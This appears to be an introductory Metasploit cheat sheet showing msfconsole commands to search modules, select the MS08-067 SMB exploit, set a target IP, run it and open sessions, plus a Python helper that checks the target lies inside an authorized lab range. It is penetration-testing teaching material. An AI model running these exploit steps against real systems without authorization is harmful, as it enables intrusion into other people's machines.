METASPLOIT INTRO CHEAT SHEET

Metasploit is a powerful tool for penetration testing and vulnerability management. It allows you to discover, exploit, and validate vulnerabilities in a controlled environment.

  1. First, download and install Metasploit from the official website (https://www.metasploit.com/).
  2. Open the Metasploit console by running the command “msfconsole” in your terminal.
  3. Once the console is open, use the command “search [term]” to search for a specific exploit or module. For example, “search windows” will search for all modules related to Windows.
  4. To use a specific exploit or module, use the command “use [module name]”. For example, “use exploit/windows/smb/ms08_067_netapi” will select the MS08-067 exploit for use.
  5. To see options for the selected module, use the command “show options”. This will display options such as target IP and payload.
  6. Set the options for the module using the command “set [option] [value]”. For example, “set RHOST 192.168.1.100” will set the target IP to 192.168.1.100.
  7. Once the options are set, use the command “exploit” to run the module.
  8. If the exploit is successful, you will have access to the target system. Use the command “sessions -l” to list all active sessions and “sessions -i [session number]” to interact with a specific session.

The above steps should provide a good starting point for using Metasploit, but it is recommended to read through the documentation and gain more experience with the tool. The same steps are shown below as they are typed in the console.

Opening the Metasploit console

msfconsole

Searching for a specific exploit or module

msf > search windows

In the above example, we used the command “search windows” to search for all modules related to Windows.

Using a specific exploit or module

msf > use exploit/windows/smb/ms08_067_netapi

In the above example, we used the command “use exploit/windows/smb/ms08_067_netapi” to select the MS08-067 exploit for use.

Viewing options for a module

msf exploit(ms08_067_netapi) > show options

In the above example, we used the command “show options” to display the options for the selected module.

Setting options for a module

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100

In the above example, we used the command “set RHOST 192.168.1.100” to set the target IP to 192.168.1.100.

Running an exploit

msf exploit(ms08_067_netapi) > exploit

In the above example, we used the command “exploit” to run the module. If the exploit is successful, we will have access to the target system. We can use the command “sessions -l” to list all active sessions and “sessions -i [session number]” to interact with a specific session.
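Because every step above assumes a controlled environment, it helps to confirm that the RHOST value really is inside the lab range you are authorized to test before it reaches the console. The following Python helper is an added example, not part of the original cheat sheet or of Metasploit itself; the scope list and function names are assumptions, and it stops at “show options” so the operator reviews the settings before typing “exploit”.

```python
import ipaddress

# Constructed lab scope (assumption): networks you are authorized to test.
AUTHORIZED_SCOPE = ["192.168.1.0/24"]


def in_scope(rhost, scope=AUTHORIZED_SCOPE):
    """True only if rhost is a single IP literal inside an authorized network."""
    try:
        addr = ipaddress.ip_address(rhost.strip())
    except ValueError:
        # Hostnames, CIDR ranges and typos are rejected rather than resolved,
        # so DNS cannot silently point the module at an out-of-scope host.
        return False
    return any(addr in ipaddress.ip_network(net) for net in scope)


def build_resource_script(module, rhost, scope=AUTHORIZED_SCOPE):
    """Return resource-script text for msfconsole, or raise if out of scope."""
    if not module or any(ch.isspace() for ch in module):
        raise ValueError("module name must be a single token")
    if not in_scope(rhost, scope):
        raise ValueError(f"{rhost!r} is outside the authorized scope {scope}")
    target = ipaddress.ip_address(rhost.strip())  # normalized form
    # Stops at "show options": the operator reviews, then types "exploit".
    return "\n".join([f"use {module}", f"set RHOST {target}", "show options"]) + "\n"


if __name__ == "__main__":
    print(build_resource_script("exploit/windows/smb/ms08_067_netapi",
                                "192.168.1.100"), end="")
```

Save the returned text to a file such as lab.rc (a hypothetical name) and load it with “msfconsole -r lab.rc”.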

This is all for now!

PEACE!